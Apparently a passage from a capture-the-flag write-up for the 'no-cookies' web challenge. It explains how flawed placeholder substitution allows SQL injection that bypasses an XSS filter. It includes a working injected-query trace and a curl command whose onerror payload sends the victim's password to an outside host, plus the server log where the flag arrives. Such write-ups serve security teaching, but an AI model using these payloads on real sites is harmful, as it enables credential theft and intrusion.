      for (const [key, value] of Object.entries(params)) {
        const clean = value.replace(/['$]/g, '');
        query = query.replaceAll(`:${key}`, `'${clean}'`);
      }
    return query;
  },

[...]
  run: (query, params) => {
    const prepared = db.prepare(query, params);
    console.log( prepared );
    return database.prepare(prepared).run();
  },
};

[...]

  db.run('INSERT INTO notes VALUES (:id, :username, :note, :mode, 0)', {
    id,
    username,
    note: note.replace(/[<>]/g, ''),
    mode,
  });

 

As you can see, the app strips < and > from the note when inserting it into the DB. It doesn't seem like there's any way to get an XSS past that filter.

However, the prepare function has a flaw that lets us manipulate how SQL queries are generated in general.

The prepare function replaces placeholders like :note with their escaped values one at a time. However, it doesn't check whether a parameter value itself contains a placeholder. For example, if your username is :note, the query gets mangled: once :username has been substituted, the later :note substitution also rewrites the :note that now sits inside the username's quotes.

As an example, consider how the following query would be prepared:

db.run('INSERT INTO notes VALUES (:id, :username, :note, :mode, 0)',
  {
    id: "12345",
    username: ":note",
    note: ', :mode, 22, 0)-- ',
    mode: '<img src=x onerror="alert(RegExp.input)">',
  }
);

Let's run through what would happen when preparing this query.

We start with:


INSERT INTO notes VALUES (:id, :username, :note, :mode, 0)

We replace :id with '12345'

INSERT INTO notes VALUES ('12345', :username, :note, :mode, 0)

We replace :username with ':note'

 INSERT INTO notes VALUES ('12345', ':note', :note, :mode, 0)

We replace :note with ', :mode, 22, 0)-- '. Both occurrences are replaced, including the one inside the username's quotes:

 INSERT INTO notes VALUES ('12345', '', :mode, 22, 0)-- '', ', :mode, 22, 0)-- ', :mode, 0)

We replace every :mode with '<img src=x onerror="alert(RegExp.input)">'

 INSERT INTO notes VALUES ('12345', '', '<img src=x onerror="alert(RegExp.input)">', 22, 0)-- '', ', '<img src=x onerror="alert(RegExp.input)">', 22, 0)-- ', '<img src=x onerror="alert(RegExp.input)">', 0)

Note that -- starts an SQL comment, so the end result is effectively:

  INSERT INTO notes VALUES ('12345', '', '<img src=x onerror="alert(RegExp.input)">', 22, 0);

 bypassing the XSS filter.
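The walkthrough above can be checked by running the substitution logic on its own. This is a sketch: the loop body is copied from the challenge's db.prepare, but the standalone prepare function, the variable names, and the step that cuts the query at the comment are mine. No database is involved; it only builds the query string.

```javascript
// Standalone copy of the challenge's substitution logic.
function prepare(query, params) {
  for (const [key, value] of Object.entries(params)) {
    const clean = value.replace(/['$]/g, '');
    query = query.replaceAll(`:${key}`, `'${clean}'`);
  }
  return query;
}

const preparedQuery = prepare(
  'INSERT INTO notes VALUES (:id, :username, :note, :mode, 0)',
  {
    id: '12345',
    username: ':note',
    note: ', :mode, 22, 0)-- ',
    mode: '<img src=x onerror="alert(RegExp.input)">',
  }
);

// Everything from the first "--" onward is an SQL comment.
const effectiveQuery = preparedQuery.slice(0, preparedQuery.indexOf('--'));

console.log(preparedQuery);
console.log(effectiveQuery);
```

The mode parameter never passes through the < and > filter, so the tag survives intact and lands in the note column.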

Success

In the end we have inserted a plaintext note containing malicious JavaScript (any note whose mode is not 'markdown' is treated as plaintext). I visited the page and got a pop-up with my password.

Now all we need to do is make a payload that instead of showing the password in an alert box, exfiltrates the password to us.

I pre-registered an account with username ":note" and password "password". I then created a note with the following curl command:

$ curl 'https://no-cookies-0ac0b52c95f3abe3.mc.ax/create' -H 'Content-Type: application/json' --data-raw '{"username":":note","password":"password","note":",:mode, 22, 0)-- ","mode":"<img src=x onerror=\"window.location=&quot;https://bawolff.net?&quot;+RegExp.input\">"}'


{"id":"32e8c795bb8b44b74d52d74e261a2942"}

 
I then submitted the view URL to the admin bot service, waited for the admin bot to visit it, and watched my web server log. Sure enough, I soon saw:

34.139.106.105 - - [06/Feb/2022:08:52:49 +0000] "GET /?dice{curr3nt_st4t3_0f_j4v45cr1pt} HTTP/1.1" 200 5514 "https://no-cookies-0ac0b52c95f3abe3.mc.ax/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/100.0.4855.0 Safari/537.36"

Thus the flag is dice{curr3nt_st4t3_0f_j4v45cr1pt} 

 

P.S. I hear that RegExp.input isn't the only possible solution. I definitely would not have thought of this myself, but I heard some teams used a really ingenious approach: replacing the document.querySelector and JSON.stringify functions and re-invoking the inner async anonymous function, so that the attacker-controlled JSON.stringify gets called with the password. That is an absolutely beautiful exploit.